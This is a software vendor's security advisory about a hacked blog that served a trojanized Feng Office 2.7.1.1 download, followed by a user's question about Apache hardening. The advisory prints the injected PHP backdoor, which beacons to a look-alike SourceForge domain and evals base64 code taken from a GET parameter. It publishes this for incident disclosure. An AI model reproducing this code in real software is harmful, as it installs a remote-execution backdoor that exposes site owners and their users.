A few weeks ago our blog was hacked with one concrete purpose: to modify the download link for what was the latest released version.
This resulted in some users downloading an infected copy of Feng Office version 2.7.1.1
Affected installations
The link modified the download destination and inserted a local file to download an infected version 2.7.1.1 of the Community Edition.
Installations running a different version, or a 2.7.1.1 downloaded from Sourceforge are not affected.
Recommended Measures
The most effective way to be 100% sure is to download and update to the latest version.
The attack
The infected version was uploaded, and a fake download link was put on our website, making use of an exploit on our blog engine (WordPress).
We have since removed all infected files from our website and resolved the Apache settings allowing the security exploit.
The infection was introduced on the files “init.php” and “environment/environment.php”, on line 22. The infected code looks like this:
In init.php:
file_get_contents('http://sourceforge.net/raport.php?site='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
if(!empty($_GET['lal']))eval(base64_decode($_GET['lal']));
In environment.php:
if(!ini_get('session.auto_start') || (strtolower(ini_get('session.auto_start')) == 'off')) {
if ( !isset($_GET['avoid_session']) || (isset($_GET['avoid_session']) && !$_GET['avoid_session']) ){
session_start(); // Start the session
}
}
file_get_contents('http://sourrceforge.net/raport.php?site='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
include_once ENVIRONMENT_PATH . '/classes/Env.class.php';
...
if(!empty($_GET['lal']))eval(base64_decode($_GET['lal']));
We would like to thank the two users who detected the issue and reported it to our team.
We should have been quicker to process the reports and to issue this post. Please accept our apologies for not being faster to publish this information; especially if your installation was affected.
Hopefully, we will handle it better if a similar attack happens again.
Could you please tell us how you fixed Apache? If a visitor was allowed to modify your PHP script because of some exploit they found in Apache, I’d like to make sure my website is secure. I don’t really have a website yet. I have a Virtual Private Server through GoDaddy but I’m trying to make sure everything’s secure before I start working on the site. GoDaddy provides a copy of cPanel for me to use and it includes Installatron. Although I haven’t used Installatron (and don’t really plan on using it), I keep getting e-mails talking about how Installatron updated some packages. I’m guessing it’s updating the list of available packages that I can install, because I don’t have any packages installed. Today, I got an e-mail from Installatron saying:
UPDATED APPS
concrete 5.7.5.6
fengoffice 3.4.0.17
Since Feng Office was one of the updated apps, would I have to worry about Installatron downloading some malicious version of Feng Office that could potentially allow a hacker in? Thanks and keep up the good work of letting your customers know about issues like this, rather than just trying to cover it up!